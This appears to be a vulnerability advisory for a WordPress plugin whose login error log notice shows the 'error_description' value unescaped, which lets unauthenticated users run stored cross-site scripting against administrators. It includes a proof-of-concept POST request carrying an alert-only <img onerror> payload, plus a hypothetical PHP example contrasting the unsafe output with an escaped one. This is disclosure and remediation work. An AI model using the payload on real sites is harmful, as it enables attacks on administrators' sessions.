The plugin does not sanitise error descriptions before outputting them in the log notice, which could allow unauthenticated users to perform Cross-Site Scripting attacks against a logged-in administrator.
POST / HTTP/1.1
Content-Length: 242
Content-Type: application/x-www-form-urlencoded

error=2&error_description=<img+src=a+onerror=alert(%26quot;XSS_Proof_of_Concept!%26quot;)>&error_uri=https%3A%2F%2Flogin.microsoftonline.com%2Ferror%3Fcode%3D700054&state=https%3A%2F%2F192.168.88.176%2Fwp-login.php%3Flogin_errors%3DCHECK_LOG2
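The missing output escaping and its fix, as an added example that is not the plugin's own code: the function names and the array layout are hypothetical, and `htmlspecialchars()` stands in for WordPress's `esc_html()` so the snippet runs without WordPress loaded. The sample value is the `error_description` from the request above, as it looks after the form body is URL-decoded.

```php
<?php
// Added example; not taken from the plugin. Names below are hypothetical.

// Constructed sample: error_description from the request above after
// URL-decoding ('+' becomes a space, '%26quot;' becomes '&quot;').
$logged = [
    'error'             => '2',
    'error_description' => '<img src=a onerror=alert(&quot;XSS_Proof_of_Concept!&quot;)>',
];

// Vulnerable pattern: the logged value is concatenated into the notice markup
// unchanged, so the browser parses it as an element. The HTML parser also
// decodes '&quot;' inside the attribute, restoring the quotes in the handler.
function render_notice_unsafe(array $entry): string
{
    return '<div class="notice notice-error"><p>Login error: '
        . $entry['error_description'] . '</p></div>';
}

// Hardened pattern: escape at output time for the HTML text context.
// In WordPress the idiomatic call is esc_html($entry['error_description']).
function render_notice_safe(array $entry): string
{
    $text = htmlspecialchars(
        $entry['error_description'],
        ENT_QUOTES | ENT_SUBSTITUTE,
        'UTF-8'
    );
    return '<div class="notice notice-error"><p>Login error: ' . $text . '</p></div>';
}

// The unsafe output contains a live <img> tag; the safe output contains only
// '&lt;img ...&gt;' text that the browser displays instead of executing.
echo render_notice_unsafe($logged), PHP_EOL;
echo render_notice_safe($logged), PHP_EOL;
```

Escaping belongs at the point where the log entry is rendered, so entries already stored before the fix are also displayed safely.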